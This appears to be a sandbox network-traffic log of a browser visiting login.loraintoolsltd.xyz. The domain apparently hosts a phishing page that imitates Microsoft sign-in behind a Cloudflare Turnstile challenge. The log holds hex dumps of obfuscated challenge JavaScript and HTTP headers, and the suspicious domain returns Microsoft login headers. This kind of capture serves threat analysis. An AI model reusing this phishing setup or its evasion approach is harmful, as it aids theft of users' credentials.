2025-01-23 23:03:22 UTC	1369	IN	Data Raw: 3d 66 47 2c 66 53 5b 67 4a 28 31 34 32 31 29 5d 3d 66 4c 2c 66 53 5b 67 4a 28 31 35 39 33 29 5d 3d 66 4d 2c 66 53 5b 67 4a 28 37 32 30 29 5d 3d 66 48 2c 66 53 5b 67 4a 28 36 39 39 29 5d 3d 66 4e 2c 66 53 5b 67 4a 28 31 31 36 30 29 5d 3d 66 4b 2c 66 53 5b 67 4a 28 31 35 37 34 29 5d 3d 66 4a 2c 66 53 5b 67 4a 28 37 36 35 29 5d 3d 66 38 2c 66 53 5b 67 4a 28 39 31 33 29 5d 3d 66 46 2c 66 53 5b 67 4a 28 33 33 39 29 5d 3d 66 45 2c 66 53 5b 67 4a 28 39 36 39 29 5d 3d 65 5a 2c 66 53 5b 67 4a 28 37 35 35 29 5d 3d 66 30 2c 66 53 5b 67 4a 28 32 38 32 29 5d 3d 66 6d 2c 66 53 5b 67 4a 28 31 37 34 29 5d 3d 66 6f 2c 66 53 5b 67 4a 28 35 30 30 29 5d 3d 66 6e 2c 66 53 5b 67 4a 28 31 32 31 31 29 5d 3d 66 79 2c 66 53 5b 67 4a 28 31 35 34 33 29 5d 3d 66 78 2c 66 53 5b 67 4a Data Ascii: =fG,fS[gJ(1421)]=fL,fS[gJ(1593)]=fM,fS[gJ(720)]=fH,fS[gJ(699)]=fN,fS[gJ(1160)]=fK,fS[gJ(1574)]=fJ,fS[gJ(765)]=f8,fS[gJ(913)]=fF,fS[gJ(339)]=fE,fS[gJ(969)]=eZ,fS[gJ(755)]=f0,fS[gJ(282)]=fm,fS[gJ(174)]=fo,fS[gJ(500)]=fn,fS[gJ(1211)]=fy,fS[gJ(1543)]=fx,fS[gJ
2025-01-23 23:03:22 UTC	1369	IN	Data Raw: 5b 69 76 28 36 31 35 29 5d 28 73 2c 69 2b 44 2c 68 5b 44 5d 29 29 3a 73 28 6f 5b 69 76 28 31 32 37 30 29 5d 28 69 2c 44 29 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 69 77 29 7b 69 77 3d 69 76 2c 4f 62 6a 65 63 74 5b 69 77 28 31 35 39 30 29 5d 5b 69 77 28 31 32 37 34 29 5d 5b 69 77 28 31 35 38 36 29 5d 28 6a 2c 48 29 7c 7c 28 6a 5b 48 5d 3d 5b 5d 29 2c 6a 5b 48 5d 5b 69 77 28 31 33 36 38 29 5d 28 47 29 7d 7d 2c 66 59 3d 67 4a 28 37 31 31 29 5b 67 4a 28 32 31 39 29 5d 28 27 3b 27 29 2c 66 5a 3d 66 59 5b 67 4a 28 37 35 33 29 5d 5b 67 4a 28 31 31 30 37 29 5d 28 66 59 29 2c 65 4d 5b 67 4a 28 34 38 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 2c 69 79 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 66 6f 72 Data Ascii: [iv(615)](s,i+D,h[D])):s(o[iv(1270)](i,D),E),C++);return j;function s(G,H,iw){iw=iv,Object[iw(1590)][iw(1274)][iw(1586)](j,H)\|\|(j[H]=[]),j[H][iw(1368)](G)}},fY=gJ(711)[gJ(219)](';'),fZ=fY[gJ(753)][gJ(1107)](fY),eM[gJ(488)]=function(h,i,iy,j,k,l,m,n,o){for
2025-01-23 23:03:22 UTC	1369	IN	Data Raw: 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 47 6d 79 55 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 58 54 78 51 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 74 41 6f 63 42 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 77 54 79 69 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 56 44 78 70 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 77 73 62 57 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 71 6c 63 48 67 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b Data Ascii: unction(h,i){return h==i},'GmyUD':function(h,i){return h<i},'XTxQo':function(h,i){return h(i)},'tAocB':function(h,i){return h\|i},'wTyip':function(h,i){return h<<i},'VDxpL':function(h,i){return i==h},'wsbWi':function(h,i){return h-i},'qlcHg':function(h,i){
2025-01-23 23:03:22 UTC	1369	IN	Data Raw: 28 33 35 37 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 6a 2c 6f 2c 73 2c 6a 45 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 52 2c 4e 2c 4f 2c 50 2c 53 2c 54 29 7b 69 66 28 6a 45 3d 6a 43 2c 78 3d 7b 7d 2c 78 5b 6a 45 28 31 33 39 33 29 5d 3d 64 5b 6a 45 28 33 37 36 29 5d 2c 42 3d 78 2c 64 5b 6a 45 28 32 30 32 29 5d 28 6e 75 6c 6c 2c 6a 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 44 3d 7b 7d 2c 45 3d 7b 7d 2c 46 3d 27 27 2c 47 3d 32 2c 48 3d 33 2c 49 3d 32 2c 4a 3d 5b 5d 2c 4b 3d 30 2c 4c 3d 30 2c 4d 3d 30 3b 64 5b 6a 45 28 38 36 36 29 5d 28 4d 2c 6a 5b 6a 45 28 31 31 33 32 29 5d 29 3b 4d 2b 3d 31 29 69 66 28 4e 3d 6a 5b 6a 45 28 33 35 37 29 5d 28 4d 29 2c 4f 62 6a 65 63 74 5b 6a 45 28 31 35 39 30 Data Ascii: (357)](i)})},'g':function(j,o,s,jE,x,B,C,D,E,F,G,H,I,J,K,L,M,R,N,O,P,S,T){if(jE=jC,x={},x[jE(1393)]=d[jE(376)],B=x,d[jE(202)](null,j))return'';for(D={},E={},F='',G=2,H=3,I=2,J=[],K=0,L=0,M=0;d[jE(866)](M,j[jE(1132)]);M+=1)if(N=j[jE(357)](M),Object[jE(1590
2025-01-23 23:03:22 UTC	1369	IN	Data Raw: 29 2c 43 3d 30 3b 38 3e 43 3b 4b 3d 50 26 31 2e 31 32 7c 4b 3c 3c 31 2c 64 5b 6a 45 28 31 35 35 32 29 5d 28 4c 2c 6f 2d 31 29 3f 28 4c 3d 30 2c 4a 5b 6a 45 28 31 33 36 38 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 65 6c 73 65 20 52 3d 7b 7d 2c 52 5b 6a 45 28 39 34 30 29 5d 3d 6a 45 28 38 39 35 29 2c 52 5b 6a 45 28 31 30 38 38 29 5d 3d 4a 5b 6a 45 28 35 35 32 29 5d 5b 6a 45 28 35 31 33 29 5d 2c 52 5b 6a 45 28 38 31 30 29 5d 3d 6a 45 28 31 33 34 35 29 2c 52 5b 6a 45 28 31 32 39 35 29 5d 3d 64 5b 6a 45 28 32 34 34 29 5d 2c 49 5b 6a 45 28 37 33 31 29 5d 5b 6a 45 28 33 35 34 29 5d 28 52 2c 27 2a 27 29 7d 65 6c 73 65 7b 66 6f 72 28 50 3d 31 2c 43 3d 30 3b 64 5b 6a 45 28 38 36 36 29 5d 28 43 2c 49 29 3b 4b 3d 64 5b Data Ascii: ),C=0;8>C;K=P&1.12\|K<<1,d[jE(1552)](L,o-1)?(L=0,J[jE(1368)](s(K)),K=0):L++,P>>=1,C++);}else R={},R[jE(940)]=jE(895),R[jE(1088)]=J[jE(552)][jE(513)],R[jE(810)]=jE(1345),R[jE(1295)]=d[jE(244)],I[jE(731)][jE(354)](R,'*')}else{for(P=1,C=0;d[jE(866)](C,I);K=d[

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:21 UTC	743	OUT	GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4vxoh/0x4AAAAAAA5pnBhoTgM91kpZ/auto/fbE/new/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-23 23:03:22 UTC	240	IN	HTTP/1.1 200 OK Date: Thu, 23 Jan 2025 23:03:22 GMT Content-Type: image/png Content-Length: 61 Connection: close cache-control: max-age=2629800, public Server: cloudflare CF-RAY: 906b6aaaaf7c5e82-EWR alt-svc: h3=":443"; ma=86400
2025-01-23 23:03:22 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRsIDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:22 UTC	696	OUT	GET /favicon.ico HTTP/1.1 Host: login.loraintoolsltd.xyz Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://login.loraintoolsltd.xyz/FgJIoRDm Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: b747-6a6f=44d01aaa0d40cdbad7418ddb99b7cff6486e9817f0ffac5caa68a31026a54cb8
2025-01-23 23:03:22 UTC	24	IN	HTTP/1.1 404 Not Found
2025-01-23 23:03:22 UTC	24	IN	Data Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a Data Ascii: Cache-Control: private
2025-01-23 23:03:22 UTC	19	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a Data Ascii: Connection: close
2025-01-23 23:03:22 UTC	37	IN	Data Raw: 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4a 61 6e 20 32 30 32 35 20 32 33 3a 30 33 3a 32 32 20 47 4d 54 0d 0a Data Ascii: Date: Thu, 23 Jan 2025 23:03:22 GMT
2025-01-23 23:03:22 UTC	101	IN	Data Raw: 4e 65 6c 3a 20 7b 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 73 22 2c 22 6d 61 78 5f 61 67 65 22 3a 38 36 34 30 30 2c 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 30 31 2c 22 66 61 69 6c 75 72 65 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 7d 0d 0a Data Ascii: Nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
2025-01-23 23:03:22 UTC	41	IN	Data Raw: 50 33 70 3a 20 43 50 3d 22 44 53 50 20 43 55 52 20 4f 54 50 69 20 49 4e 44 20 4f 54 52 69 20 4f 4e 4c 20 46 49 4e 22 0d 0a Data Ascii: P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
2025-01-23 23:03:22 UTC	50	IN	Data Raw: 52 65 66 65 72 72 65 72 2d 50 6f 6c 69 63 79 3a 20 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a Data Ascii: Referrer-Policy: strict-origin-when-cross-origin
2025-01-23 23:03:22 UTC	150	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 67 72 6f 75 70 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 73 22 2c 22 6d 61 78 5f 61 67 65 22 3a 38 36 34 30 30 2c 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 69 64 65 6e 74 69 74 79 2e 6e 65 6c 2e 6d 65 61 73 75 72 65 2e 6f 66 66 69 63 65 2e 6e 65 74 2f 61 70 69 2f 72 65 70 6f 72 74 3f 63 61 74 49 64 3d 47 57 2b 65 73 74 73 66 64 2b 77 73 74 22 7d 5d 7d 0d 0a Data Ascii: Report-To: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+wst"}]}
2025-01-23 23:03:22 UTC	80	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 78 2d 6d 73 2d 67 61 74 65 77 61 79 2d 73 6c 69 63 65 3d 65 73 74 73 66 64 3b 20 50 61 74 68 3d 2f 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a Data Ascii: Set-Cookie: x-ms-gateway-slice=estsfd; Path=/; HttpOnly; Secure; SameSite=None
2025-01-23 23:03:22 UTC	28	IN	Data Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a Data Ascii: Transfer-Encoding: chunked
2025-01-23 23:03:22 UTC	49	IN	Data Raw: 58 2d 4d 73 2d 45 73 74 73 2d 53 65 72 76 65 72 3a 20 32 2e 31 2e 31 39 38 37 30 2e 33 20 2d 20 53 43 55 53 20 50 72 6f 64 53 6c 69 63 65 73 0d 0a Data Ascii: X-Ms-Ests-Server: 2.1.19870.3 - SCUS ProdSlices

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:22 UTC	1175	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1482238646:1737670630:gvnMz6WUq3EEzTkbKMXmY7htjMwlrnl7INcjpwYtlY0/906b6aa41d244405/ELjc5mh98hUEm9Vd49aH1pPIKJXUCZOHayyvUrkrAb8-1737673400-1.1.1.1-kX2zXm1bzZdEcwlyaL8ZR403rSDB27V0f.r9GcipcEjkQZUM30GkIGD4m3eKHVCe HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 3242 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded CF-Chl-RetryAttempt: 0 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: ELjc5mh98hUEm9Vd49aH1pPIKJXUCZOHayyvUrkrAb8-1737673400-1.1.1.1-kX2zXm1bzZdEcwlyaL8ZR403rSDB27V0f.r9GcipcEjkQZUM30GkIGD4m3eKHVCe sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4vxoh/0x4AAAAAAA5pnBhoTgM91kpZ/auto/fbE/new/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-23 23:03:22 UTC	3242	OUT	Data Raw: 76 5f 39 30 36 62 36 61 61 34 31 64 32 34 34 34 30 35 3d 38 37 79 51 37 51 35 51 24 51 74 51 57 54 34 67 54 34 39 51 54 48 57 71 61 77 54 68 34 61 34 2d 41 48 65 7a 24 34 4b 52 38 34 65 48 68 63 35 55 4e 4c 52 34 46 73 4c 34 34 47 34 62 34 4d 24 52 64 65 52 59 54 51 61 47 34 30 51 52 65 4e 34 62 53 74 54 24 73 34 33 37 34 75 34 49 37 34 33 4c 34 52 46 66 34 33 51 55 35 34 6e 53 32 61 30 4b 5a 59 41 76 36 49 34 52 24 55 36 62 34 32 71 55 6d 68 71 53 47 72 43 4c 45 48 71 34 7a 66 78 51 71 63 34 52 6b 34 62 51 54 53 54 51 55 41 44 76 6b 63 35 34 55 4b 34 68 37 34 66 30 61 79 6c 7a 4a 77 34 68 4a 77 4a 57 58 48 54 55 74 6b 64 4d 51 34 4f 51 37 78 6e 57 24 34 72 36 79 77 34 49 6b 34 6e 66 57 53 43 51 69 4d 70 38 54 4c 58 30 6b 34 47 73 30 53 73 65 2d 4b 64 6e Data Ascii: v_906b6aa41d244405=87yQ7Q5Q$QtQWT4gT49QTHWqawTh4a4-AHez$4KR84eHhc5UNLR4FsL44G4b4M$RdeRYTQaG40QReN4bStT$s4374u4I743L4RFf43QU54nS2a0KZYAv6I4R$U6b42qUmhqSGrCLEHq4zfxQqc4Rk4bQTSTQUADvkc54UK4h74f0aylzJw4hJwJWXHTUtkdMQ4OQ7xnW$4r6yw4Ik4nfWSCQiMp8TLX0k4Gs0Sse-Kdn
2025-01-23 23:03:23 UTC	771	IN	HTTP/1.1 200 OK Date: Thu, 23 Jan 2025 23:03:23 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 159580 Connection: close cf-chl-gen: Gzcr2xZYE0c5hCOuKWyIRv7lBlmVQIqJQRYz6iX7CgTCQyDEskXschT4mH40Bf8udEjABy//TfElxIQYd977THcDtBB22qDDp7EH4hl5F7XSFEH32JppleLyLHJQp0GjiRvfV9nlIm1fBy7DwpvbZtlLaoHM/cJP+e/MYU+L3pwVYehXA5GEPLuhKLWcIsVzD/t2gdnun+OvjPdSwLYEeUEP6djrP87H3Bet+V3Qp1UQcp3F3FUaC1PJIOxA3GhZjzN5YNUpVDBdK9UPmT5IuVm6BCi+4fQsUAE2xsglD9jd/e0ldjlZBn/CgaMZ63S9RVlEfoUte+sEHjBo6Detk+9GZjEO9hnu8Y9s0SmWzf5TZU3nX+ToA9rICXz8rc9IDXS1Z75YVM04C9eSFdv6E8E3tLUBwsfkb1VU8SzXVHFAkdd3oWUAmoYPnMksa7w7rPwsaiN9AbiyqkFpr5KiT5brgyKcMXEaSjVZmi5v7DkTLmtuvIM70vv6c2mfIV5/$8/+0oc5+pZN2HU5pZ/zdOw== Server: cloudflare CF-RAY: 906b6ab0f84d5e60-EWR alt-svc: h3=":443"; ma=86400
2025-01-23 23:03:23 UTC	598	IN	Data Raw: 6b 4a 61 41 75 38 47 74 64 34 58 46 77 72 57 65 6d 62 65 68 6e 5a 69 2b 6e 4a 4b 53 69 70 43 6b 72 4b 66 58 6d 4e 53 59 72 70 33 56 31 39 79 5a 6f 72 6e 6b 31 39 33 70 31 4f 6a 49 75 4d 4c 41 79 2b 33 4a 76 72 37 75 37 2b 62 41 72 76 50 47 79 63 6d 39 2b 50 33 58 32 50 6b 42 32 66 62 33 77 63 54 68 36 63 51 4c 37 65 58 62 2f 66 48 6c 30 77 4d 51 35 75 4c 4f 47 4e 6e 6e 46 2f 45 4a 31 52 45 59 46 74 6b 56 48 43 54 35 33 75 51 6e 2b 43 77 44 49 53 67 50 4c 76 6f 6d 4b 78 34 45 4a 69 38 69 42 69 30 52 50 79 6b 4d 41 44 63 65 51 42 6b 63 2f 55 49 42 52 78 5a 4c 47 45 38 34 44 78 34 69 4b 30 77 6f 49 46 42 56 4d 30 64 52 58 54 51 55 56 42 74 63 54 30 73 65 55 47 64 47 61 53 6c 42 52 79 70 6c 4e 7a 6b 34 51 6c 35 68 55 6e 4d 77 62 33 68 7a 55 56 52 6f 61 44 70 Data Ascii: kJaAu8Gtd4XFwrWembehnZi+nJKSipCkrKfXmNSYrp3V19yZornk193p1OjIuMLAy+3Jvr7u7+bArvPGycm9+P3X2PkB2fb3wcTh6cQL7eXb/fHl0wMQ5uLOGNnnF/EJ1REYFtkVHCT53uQn+CwDISgPLvomKx4EJi8iBi0RPykMADceQBkc/UIBRxZLGE84Dx4iK0woIFBVM0dRXTQUVBtcT0seUGdGaSlBRyplNzk4Ql5hUnMwb3hzUVRoaDp
2025-01-23 23:03:23 UTC	1369	IN	Data Raw: 74 33 4f 58 56 62 62 6d 39 77 61 6d 6c 33 59 58 79 45 5a 45 69 51 68 34 68 71 64 6f 70 55 6a 35 70 7a 6d 4a 68 6c 6d 46 61 4f 63 57 74 61 6a 48 61 41 5a 4b 64 78 6e 70 4e 6e 66 57 6c 75 62 36 75 45 68 5a 47 76 72 62 65 68 73 37 57 34 6a 48 32 55 75 4b 78 37 72 59 47 66 6b 34 4f 52 66 35 72 46 6f 4c 6e 47 6d 70 79 5a 71 4a 32 2b 6f 4b 2b 57 6f 63 50 5a 74 37 47 73 31 71 75 52 72 39 50 42 76 62 72 51 74 5a 2b 66 31 4b 54 46 77 39 7a 43 75 65 48 4f 72 63 69 79 34 73 58 69 73 75 58 4b 79 4d 53 76 74 75 76 52 36 38 48 78 30 72 73 48 32 65 4c 49 31 75 45 4e 34 50 72 62 35 64 45 51 42 76 33 56 7a 41 66 6c 42 2f 58 57 42 77 6a 58 44 41 6f 4d 38 52 44 33 45 2f 55 6f 41 42 6f 69 39 53 67 64 2f 67 59 42 4a 41 41 6d 4d 51 77 47 4c 79 51 6d 4c 6a 59 53 47 68 2f 35 39 Data Ascii: t3OXVbbm9waml3YXyEZEiQh4hqdopUj5pzmJhlmFaOcWtajHaAZKdxnpNnfWlub6uEhZGvrbehs7W4jH2UuKx7rYGfk4ORf5rFoLnGmpyZqJ2+oK+WocPZt7Gs1quRr9PBvbrQtZ+f1KTFw9zCueHOrciy4sXisuXKyMSvtuvR68Hx0rsH2eLI1uEN4Prb5dEQBv3VzAflB/XWBwjXDAoM8RD3E/UoABoi9Sgd/gYBJAAmMQwGLyQmLjYSGh/59
2025-01-23 23:03:23 UTC	1369	IN	Data Raw: 69 56 6c 64 33 61 49 69 45 6b 4a 43 4b 63 6f 74 4c 63 6f 61 55 57 47 70 34 55 34 6d 54 63 5a 75 65 65 31 74 32 6c 57 36 6c 67 35 79 6c 61 6f 4e 31 61 57 31 68 5a 34 52 36 5a 58 46 76 6c 70 47 47 69 4b 71 44 74 58 4f 4f 6a 48 32 79 76 70 75 44 6d 58 31 2f 6b 49 53 31 70 4d 61 63 6d 59 6d 37 7a 6f 36 75 72 4c 54 52 71 64 57 71 32 73 50 48 31 4a 65 6f 30 39 43 63 34 72 7a 5a 74 36 44 6c 33 37 71 31 33 65 53 72 6f 65 66 6d 72 37 7a 78 72 2b 62 74 37 65 4f 34 2b 38 33 47 78 39 4b 38 33 63 76 52 41 76 4c 41 31 39 38 45 43 39 33 44 43 4d 6f 42 37 74 34 54 30 65 7a 55 38 41 54 52 32 41 66 32 37 39 58 59 43 2b 76 38 2f 43 54 76 44 78 50 33 4a 53 66 70 2b 69 49 74 4b 79 66 69 49 78 30 4d 43 2f 45 7a 44 79 6e 30 4e 78 4d 72 39 7a 72 35 4d 2f 34 75 2b 54 45 44 4d 2f Data Ascii: iVld3aIiEkJCKcotLcoaUWGp4U4mTcZuee1t2lW6lg5ylaoN1aW1hZ4R6ZXFvlpGGiKqDtXOOjH2yvpuDmX1/kIS1pMacmYm7zo6urLTRqdWq2sPH1Jeo09Cc4rzZt6Dl37q13eSroefmr7zxr+bt7eO4+83Gx9K83cvRAvLA198EC93DCMoB7t4T0ezU8ATR2Af279XYC+v8/CTvDxP3JSfp+iItKyfiIx0MC/EzDyn0NxMr9zr5M/4u+TEDM/
2025-01-23 23:03:23 UTC	1369	IN	Data Raw: 5a 6f 68 49 61 34 78 7a 68 6b 32 54 68 48 57 46 6c 4a 71 58 6a 4a 4b 4d 6a 61 46 56 58 49 46 66 68 48 70 66 64 32 56 73 62 59 32 73 59 6f 36 6f 72 34 4b 32 66 70 61 57 64 37 57 73 72 70 43 36 73 6e 71 67 6c 48 2b 51 74 71 4f 44 74 4b 69 44 71 63 43 6c 71 49 57 66 6b 63 2f 54 6a 4b 65 76 6a 73 69 6e 32 63 53 61 72 4c 4f 64 77 64 43 63 72 64 43 6c 75 5a 37 5a 75 62 50 44 79 63 44 64 7a 38 75 77 38 63 37 53 74 4e 57 33 31 66 44 79 2b 75 2f 70 7a 75 43 36 37 4c 30 44 76 75 44 30 2b 75 66 31 78 67 7a 33 41 63 44 42 36 4e 72 71 39 4d 62 32 39 39 41 50 38 68 67 4a 36 65 7a 33 44 68 58 75 45 41 41 6c 2b 42 63 49 49 2f 59 61 43 79 45 66 4d 41 54 72 42 43 6b 68 45 53 45 57 36 51 6b 75 4a 69 72 35 4a 69 30 52 4c 44 6f 50 51 44 77 2b 51 53 63 42 52 68 38 44 53 69 5a Data Ascii: ZohIa4xzhk2ThHWFlJqXjJKMjaFVXIFfhHpfd2VsbY2sYo6or4K2fpaWd7WsrpC6snqglH+QtqODtKiDqcClqIWfkc/TjKevjsin2cSarLOdwdCcrdCluZ7ZubPDycDdz8uw8c7StNW31fDy+u/pzuC67L0DvuD0+uf1xgz3AcDB6Nrq9Mb299AP8hgJ6ez3DhXuEAAl+BcII/YaCyEfMATrBCkhESEW6QkuJir5Ji0RLDoPQDw+QScBRh8DSiZ
2025-01-23 23:03:23 UTC	1369	IN	Data Raw: 55 79 4d 62 57 68 6e 69 48 31 71 58 48 35 76 6b 57 36 50 6d 32 43 6d 6d 58 75 45 5a 61 56 73 64 61 64 6f 72 57 71 52 68 34 43 49 62 6e 47 50 70 62 4b 70 6c 70 65 75 77 4c 6c 39 74 36 36 67 6e 35 37 41 76 4d 57 66 70 36 43 64 69 72 36 71 75 63 4c 50 31 59 2b 75 6c 62 66 56 78 36 2f 4a 70 37 65 52 30 36 75 72 73 72 53 32 33 71 57 6d 77 4c 6e 4d 71 38 4c 57 34 39 76 6b 36 65 2f 51 37 4e 37 44 32 62 4c 61 39 66 44 4c 30 2f 50 6f 34 64 4c 58 76 76 76 42 32 65 58 2b 36 2f 76 71 42 51 37 6c 42 76 49 49 34 4e 54 68 45 4e 49 52 35 78 72 53 47 65 6b 51 35 2f 76 30 45 76 63 68 39 77 4c 33 46 4f 67 71 4c 66 66 33 35 69 51 51 43 4f 34 68 37 67 77 68 4d 7a 6b 62 38 53 67 39 50 51 6e 33 50 54 6b 52 4c 44 34 64 2f 52 30 64 49 79 63 48 43 79 63 4f 44 78 77 79 50 45 55 6a Data Ascii: UyMbWhniH1qXH5vkW6Pm2CmmXuEZaVsdadorWqRh4CIbnGPpbKplpeuwLl9t66gn57AvMWfp6Cdir6qucLP1Y+ulbfVx6/Jp7eR06ursrS23qWmwLnMq8LW49vk6e/Q7N7D2bLa9fDL0/Po4dLXvvvB2eX+6/vqBQ7lBvII4NThENIR5xrSGekQ5/v0Evch9wL3FOgqLff35iQQCO4h7gwhMzkb8Sg9PQn3PTkRLD4d/R0dIycHCycODxwyPEUj
2025-01-23 23:03:23 UTC	1369	IN	Data Raw: 68 32 6b 61 43 63 66 33 57 43 62 6d 36 50 58 35 57 5a 66 70 57 46 62 57 31 2f 72 48 2b 69 66 35 53 45 74 34 65 57 72 72 53 46 73 49 65 38 6a 71 79 32 6d 35 32 39 6a 37 4f 42 68 72 71 34 77 62 71 73 71 5a 71 74 71 4b 32 6f 68 72 61 6b 6b 37 4f 30 6b 35 66 61 75 37 75 34 79 63 2b 67 32 39 37 4f 32 2b 65 69 32 37 61 31 33 75 65 2f 34 71 76 6c 30 36 7a 64 36 63 65 70 7a 66 50 4d 75 4e 66 78 39 73 7a 52 30 72 6e 7a 30 65 37 32 2b 39 72 66 42 4e 55 46 41 38 6e 6c 43 51 6e 6a 7a 41 4d 4a 7a 63 6e 6d 31 66 51 4a 39 4f 77 4b 48 50 44 35 47 68 62 6b 2f 65 41 68 49 76 72 6f 4a 67 30 72 42 79 30 5a 42 66 48 71 46 53 6b 50 45 42 44 32 4a 79 67 75 47 7a 6b 63 4e 7a 4e 44 49 44 51 6d 46 78 67 44 51 41 64 41 51 44 6b 77 51 45 6b 4f 4d 43 5a 43 56 55 59 72 4e 79 4a 44 4c Data Ascii: h2kaCcf3WCbm6PX5WZfpWFbW1/rH+if5SEt4eWrrSFsIe8jqy2m529j7OBhrq4wbqsqZqtqK2ohrakk7O0k5fau7u4yc+g297O2+ei27a13ue/4qvl06zd6cepzfPMuNfx9szR0rnz0e72+9rfBNUFA8nlCQnjzAMJzcnm1fQJ9OwKHPD5Ghbk/eAhIvroJg0rBy0ZBfHqFSkPEBD2JyguGzkcNzNDIDQmFxgDQAdAQDkwQEkOMCZCVUYrNyJDL
